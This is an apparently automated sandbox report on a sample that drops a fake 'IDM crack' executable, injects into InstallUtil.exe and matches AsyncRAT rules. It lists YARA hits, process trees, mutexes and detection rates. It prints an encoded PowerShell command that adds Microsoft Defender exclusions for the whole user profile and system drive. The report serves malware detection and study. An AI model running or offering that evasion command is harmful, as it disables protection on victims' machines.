Source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.Ouopxupnarf.exe.31523b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 10.2.Ouopxupnarf.exe.31523b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.Ouopxupnarf.exe.310b37c.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 10.2.Ouopxupnarf.exe.310b37c.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.1852689671.0000000005126000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2892516704.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.1909891753.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000005.00000002.2890976907.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000002.1911540442.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.1845196723.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Hzoynygqzv.exe PID: 7416, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 7556, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Ouopxupnarf.exe PID: 7760, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 7852, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 7852, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Ouopxupnarf.exe PID: 7984, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 8040, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

Creates files with lurking names (e.g. Crack.exe)

Source: C:\Users\user\Desktop\KMj8h32vWy.exe

File created: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_043FB570	1_2_043FB570
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_012B6418	3_2_012B6418
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_012BC7D8	3_2_012BC7D8
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542C68F	3_2_0542C68F
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_05425C98	3_2_05425C98
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_05429F88	3_2_05429F88
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542AA4D	3_2_0542AA4D
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542C556	3_2_0542C556
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542C730	3_2_0542C730
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542C7AE	3_2_0542C7AE
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542C193	3_2_0542C193
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542C2FA	3_2_0542C2FA
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542BD4A	3_2_0542BD4A
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542BC06	3_2_0542BC06
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542C85B	3_2_0542C85B
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542C8FA	3_2_0542C8FA
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542CBA2	3_2_0542CBA2
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542CA4F	3_2_0542CA4F
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 3_2_0542CAF0	3_2_0542CAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_00C35CF0	5_2_00C35CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_00C3A7A8	5_2_00C3A7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_00C359A8	5_2_00C359A8
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 7_2_0159C7D8	7_2_0159C7D8
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_0144C7D8	10_2_0144C7D8
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_06220032	10_2_06220032
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_06220040	10_2_06220040
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_06222D48	10_2_06222D48
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_06222D50	10_2_06222D50
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_062DDC20	10_2_062DDC20
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_062C001E	10_2_062C001E
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_062DD070	10_2_062DD070
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Code function: 10_2_062C0040	10_2_062C0040

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe FE44F050AB9EA33F87ACEF449ED57157A331A19956207D6243522676C894E284

Source: IDM_6.4x_Crack_v18.1.exe.0.dr

Static PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

Source: KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameunsigntool.exe6 vs KMj8h32vWy.exe

Source: KMj8h32vWy.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.Ouopxupnarf.exe.34c4d24.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.Ouopxupnarf.exe.34c4d24.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Hzoynygqzv.exe.30ff474.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Hzoynygqzv.exe.30ff474.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Hzoynygqzv.exe.30b1758.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Hzoynygqzv.exe.30b1758.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.Ouopxupnarf.exe.347dcf0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.Ouopxupnarf.exe.347dcf0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.Ouopxupnarf.exe.31523b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.Ouopxupnarf.exe.31523b0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.Ouopxupnarf.exe.310b37c.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.Ouopxupnarf.exe.310b37c.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.1852689671.0000000005126000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2892516704.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.1909891753.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000005.00000002.2890976907.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000B.00000002.1911540442.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.1845196723.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Hzoynygqzv.exe PID: 7416, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: InstallUtil.exe PID: 7556, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Ouopxupnarf.exe PID: 7760, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: InstallUtil.exe PID: 7852, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: InstallUtil.exe PID: 7852, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Ouopxupnarf.exe PID: 7984, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: InstallUtil.exe PID: 8040, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: classification engine

Classification label: mal100.troj.evad.winEXE@17/13@1/1

Source: C:\Users\user\Desktop\KMj8h32vWy.exe

File created: C:\Users\user\AppData\Local\Hzoynygqzv.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Mutant created: \Sessions\1\BaseNamedObjects\IDM 6.4x Crack
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\vWKJAJDsDf09

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psw0gbbs.gph.ps1

Jump to behavior

Source: KMj8h32vWy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\KMj8h32vWy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KMj8h32vWy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: KMj8h32vWy.exe	ReversingLabs: Detection: 71%
Source: KMj8h32vWy.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\KMj8h32vWy.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_0-120

Source: unknown	Process created: C:\Users\user\Desktop\KMj8h32vWy.exe "C:\Users\user\Desktop\KMj8h32vWy.exe"
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Users\user\AppData\Local\Hzoynygqzv.exe "C:\Users\user\AppData\Local\Hzoynygqzv.exe"
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe "C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe"
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe "C:\Users\user\AppData\Roaming\Ouopxupnarf.exe"
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe "C:\Users\user\AppData\Roaming\Ouopxupnarf.exe"
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Users\user\AppData\Local\Hzoynygqzv.exe "C:\Users\user\AppData\Local\Hzoynygqzv.exe"	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe "C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: propsys.dll	Jump to behavior
